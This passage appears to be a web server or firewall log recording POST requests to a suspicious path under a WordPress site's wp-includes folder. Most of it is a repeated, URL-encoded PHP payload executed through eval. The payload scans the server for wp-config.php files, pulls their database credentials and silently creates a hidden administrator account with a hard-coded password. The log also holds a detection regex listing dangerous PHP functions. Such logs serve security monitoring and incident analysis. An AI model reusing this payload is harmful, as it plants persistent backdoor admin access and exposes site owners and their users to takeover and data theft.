%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:11:14","213.209.159.254","POST","\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> mInwNQ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php HTTP\/1.1\ncontent-length:12663\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-ch-ua:\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-platform:\"macOS\"\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-user:?1\nsec-fetch-dest:document\n\nmInwNQ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%